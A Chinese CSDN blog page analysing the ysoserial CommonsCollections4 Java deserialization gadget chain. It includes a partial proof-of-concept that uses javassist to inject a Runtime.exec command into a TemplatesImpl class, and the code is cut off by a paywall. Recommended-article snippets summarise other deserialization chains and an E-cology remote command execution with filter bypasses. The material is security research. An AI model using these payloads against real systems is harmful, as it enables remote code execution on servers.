ysoserial CommonsColletions4分析

最新推荐文章于 2024-02-29 23:14:21 发布
最新推荐文章于 2024-02-29 23:14:21 发布
阅读量161 收藏
点赞数
分类专栏: JAVA安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45382656/article/details/118637617
版权
本文介绍了 ysoserial 中的 CommonsCollections4 模块,其构造 payload 是基于 CC3 和 CC2 的组合,但需要注意 TransformingComparator 在特定版本不支持反序列化。在 JDK 1.7 和 1.8 下,通过 javassist 创建攻击类,利用 ConstantTransformer、InstantiateTransformer、ChainedTransformer 构建调用链,并借助 TransformingComparator 触发。在优先级队列反序列化过程中,利用 compare 方法实现攻击。总结了构造 payload 的关键点,包括 size、initialCapacity 和 comparator 的设置。
摘要由CSDN通过智能技术生成

其实CC4就是 CC3前半部分和CC2后半部分 拼接组成的,没有什么新的知识点。

不过要注意的是,CC4和CC2一样需要在commons-collections-4.0版本使用,3.1-3.2.1版本不能去使用,原因是TransformingComparator类在3.1-3.2.1版本中还没有实现Serializable接口,无法被反序列化。

JDK版本对于CC2和CC4来说,1.7和1.8都测试成功,下面我们就来快速构造一下payload

构造payload

CC4用的是javassist创建攻击类,使用TemplatesImpl类中的newTransformer方法触发攻击类中的静态方法

public class Demo {
   
    public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
   
        Field field = obj.getClass().getDeclaredField(fieldName);
        field.setAccessible(true);
        field.set(obj, value);
    }

    public static void main(String[] args) throws Exception {
   
        String AbstractTranslet="com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet";
        //创建CommonsCollections2对象,父类为AbstractTranslet,注入了payload进构造函数
        ClassPool classPool= ClassPool.getDefault();//返回默认的类池
        classPool.appendClassPath(AbstractTranslet);//添加AbstractTranslet的搜索路径
        CtClass payload=classPool.makeClass("CommonsCollections2");//创建一个新的public类
        payload.setSuperclass(classPool.get(AbstractTranslet));  //设置CommonsCollections2类的父类为AbstractTranslet
        payload.makeClassInitializer().setBody("java.lang.Runtime.getRuntime().exec(\"calc\");"); //创建一个static方法,并插入runtime
        byte[] bytes=payload.toBytecode();//转换为byte数组

        TemplatesImpl templatesImpl = new TemplatesImpl
最低0.47元/天 解锁文章
洋洋cc
关注
专栏目录
yso之Commons Collections
糖小喵
06-29 582
CommonCollection Gadget主要是由ConstantTransformer,InvokerTransformer,ChainedTransformer构成。gadget主要通过Transformer接口的transform方法,对输入的对象做变换。 ConstantTransformer不会做任何变换,只会返回类在实例化时传入的对象, InvokerTransformer会对类在实例化时传入的参数,通过反射去调用, ChainedTransformer将所有的Transformer连
ysoserial反序列化gadget原理-part3:CommonsCollections3/2/4
mole_exp的博客
02-11 3037
上一篇文章,笔者收集汇总了Java中动态加载字节码的方法,其中之一就是利用TemplatesImpl去加载类的字节码。而ysoserial中CommonsCollections 3/2/4这三条利用链就用到了TemplatesImpl。
[Java反序列化]—CommonsCollections4
Sentiment的博客
06-02 840
之前分析的CC链都是基于CommonsCollections3.2.1及其之前版本的,而后边退出了新的版本,而本篇分析的就是基于CC 4.0版本的(除此外还有CC2)本条链的前半段其实跟CC3一样,都是一个动态加载字节码的过程,而后边构造时,主要用到了两个类和这里ysoseria并没有给出,所以仿照ysoseria总结了一下: PriorityQueue 先看下测试代码: 之所以用它,是因为它重写了自己的方法 最后调用了 接着调用 当comparator不为null时调用 最后调用,而在本类的构造方法中可控
Ysoserial Commons-Collections利用链分析
further_eye的博客
09-09 406
Commons-Collections1 首先构造transformers反射链,调用ChainedTransformer方法封装transformers数组,串联三次反射。 final Transformer[] transformers = new Transformer[] { new ConstantTransformer(Runtime.class), new InvokerTransformer("getMethod", new Class[] {String.class, Cl
CTFSHOW web入门 java反序列化篇(更新中)
羽的博客
12-07 4843
ctfshow web入门 java反序列化篇
ysoserial CommonsColletions5分析
洋洋的小黑屋
07-10 139
我们知道,AnnotationInvocationHandler类在JDK8u71版本以后,官方对readobject进行了改写。 所以要挖掘出一条能替代的类BadAttributeValueExpException 在CC5中除了有一个新的类BadAttributeValueExpException外,还有一个新的类TiedMapEntry,用来调用LazyMap的get方法 TiedMapEntry 在TiedMapEntry的getValue方法中调用了get方法 而map成员变量则是由构造函数传入
JAVA反序列化漏洞-ysoserial-URLDNS链分析
最新发布
分享IT行业各种技术经验,从入门到入行,关注我学习更多知识。
02-29 919
对于进行反序列化漏洞原理的学习,URLDNS这条链比较好理解,对后续学习打个基础,URLDNS也是经常用于验证Java反序列化漏洞是否存在,验证服务主机是否出网等情况,为了后期进一步有效性的利用。让我们开始学习吧!
ysoserial.jar
12-16
ysoserial 是安全测试 playload 生成工具
109-Java反序列化之ysoserial URLDNS模块分析.pdf
09-20
Java 反序列化之 ysoserial URLDNS 模块分析 Java 反序列化漏洞是 Java 语言中的一种常见漏洞,利用 ysoserial 工具可以对其进行攻击。ysoserial 是一个 Java 反序列化漏洞利用工具,提供了多种 payload,可以对...
从JDBC attack到detectCustomCollations利用范围扩展
include_voidmain的博客
09-01 175
从JDBC attack到detectCustomCollations利用范围扩展
Java安全—CommonsCollections4
Java_ttcd的博客
08-17 362
PriorityQueue是一个优先队列,作用是用来排序,重点在于每次排序都要触发传入的比较器comparator的compare()方法 在CC2中,此类用于调用PriorityQueue重写的readObject来作为触发入口。这次给大家带来的是CC4链的简单分析,可以看到CC4链还是没有脱离之前跟的链的影子,我们可以看到CC3的前半部分以及CC2的后半部分,需要注意的问题的话就是版本问题了吧还有上面提到的一些小细节,至此CC链就快跟完了。这里用到的是该类的add方法,将指定的元素插入此优先级队列。..
Javaweb安全——反序列化漏洞-commons-collections4利用链(CC2和CC4
weixin_43610673的博客
07-06 2403
在2015年底commons-collections反序列化利用链被提出时,Apache Commons Collections有以下两个分支版本:对旧CC链的影响主要体现在 这个方法被修改了在commons-collections4中对应的方法为。3和4的groupId和artifactId都不一样所以可以在同一项目中共存方便调试。 还是做的一个LazyMap构造函数包装,基本就是改了个名字,那将之前的链子decorate换成lazyMap就行,导入的包名变。以CC6为例: CC1、CC3、CC6修改之后
『Java安全』反序列化-CC4反序列化漏洞POP链分析_ysoserial CommonsCollections4 PoC分析
Ho1aAs‘s Blog
03-12 1014
文章目录前言代码复现工具类PoC代码审计 | 原理分析1. TrAXFilter构造器传入TemplatesImpl会调用newTransformer()2. InstantiateTransformer.transform()调用指定的类构造器3. TransformingComparator.compare()调用this.transformer.transform()4. PriorityQueue反序列化调用comparator.compare()POP链完 前言 同样的,CC4是CC2的变种,改变
泛微OA E-cology(CNVD-2019-32204)远程命令执行漏洞复现分析
洋洋的小黑屋
03-16 2728
漏洞复现 影响版本: E-cology 7.0 E-cology 8.0 E-cology 8.1 E-cology 9.0 直接在网站根目录后加入组件访问路径 /weaver/bsh.servlet.BshServlet/,如下图执行了命令“whoami” 绕过方式: 1.unicode编码 2.字符串拼接 bsh.script=eval%00("ex"%2b"ec(bsh.httpSer...
weblogic漏洞分析之CVE-2016-0638
洋洋的小黑屋
08-17 2233
weblogic漏洞分析之CVE-2016-0638 一、环境搭建: 这里使用前一篇文章的环境,然后打上补丁 上一篇文章:https://www.cnblogs.com/yyhuni/p/15137095.html 下载补丁p20780171_1036_Generic和p22248372_1036012_Generic 解压补丁后,复制补丁到Docker中: docker cp ./p22248372_1036012_Generic/ d1b6be39e32e:/home/ docker cp ./p2
JAVA反序列化漏洞基础原理
洋洋的小黑屋
05-11 1593
JAVA反序列化漏洞基础原理 1.1 什么是序列化和反序列化? Java序列化是指把Java对象转换为字节序列的过程; Java反序列化是指把字节序列恢复为Java对象的过程; 1.2 为什么要序列化 对象不只是存储在内存中,它还需要在传输网络中进行传输,并且保存起来之后下次再加载出来,这时候就需要序列化技术。 Java的序列化技术就是把对象转换成一串由二进制字节组成的数组,然后将这二进制数据...
weblogic漏洞分析之CVE-2017-10271
洋洋的小黑屋
08-17 1579
weblogic漏洞分析之CVE-2017-10271 一、环境搭建 1)配置docker 这里使用vulhub的环境:CVE-2017-10271 编辑docker-compose.yml文件,加入8453端口 version: '2' services: weblogic: image: vulhub/weblogic:10.3.6.0-2017 ports: - "7001:7001" - "8453:8453" 启动docker docker-compose
ysoserial CommonsColletions3分析(1)
洋洋的小黑屋
07-07 1314
ysoserial CommonsColletions3分析(1) CC3的利用链在JDK8u71版本以后是无法使用的,具体还是由于AnnotationInvocationHandler的readobject进行了改写。 而CC3目前有两条主流的利用链,利用TransformedMap或者LazyMap。我们这篇文章先讲TransformedMap链 TemplatesImpl 在CC2中利用javassist创建了一个攻击类,使用TemplatesImpl类中的newTransformer方法触发 这里写
ysoserial安装
08-16
要安装 ysoserial,你可以按照以下步骤进行操作: 1. 首先,确保你已经安装了 Java Development Kit (JDK)。你可以在命令行中运行 `java -version` 来检查是否已经安装了 JDK。 2. 在你的操作系统上创建一个文件夹,用于存放 ysoserial 的代码和相关文件。 3. 打开终端或命令提示符,并进入到该文件夹。 4. 使用 Git 命令克隆 ysoserial 的代码库。运行以下命令: ``` git clone https://github.com/frohoff/ysoserial.git ``` 5. 进入 ysoserial 文件夹: ``` cd ysoserial ``` 6. 构建 ysoserial 的 JAR 文件。运行以下命令: ``` mvn clean package -DskipTests ``` 7. 构建完成后,在 `target` 文件夹下会生成一个名为 `ysoserial-[version].jar` 的 JAR 文件,其中 `[version]` 是 ysoserial 的版本号。 现在,你已经成功安装了 ysoserial。你可以使用该工具来生成各种常见的 Java 反序列化漏洞 payload。记得在使用 ysoserial 时要遵循良好的安全实践,并仅在合法的测试环境中使用。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值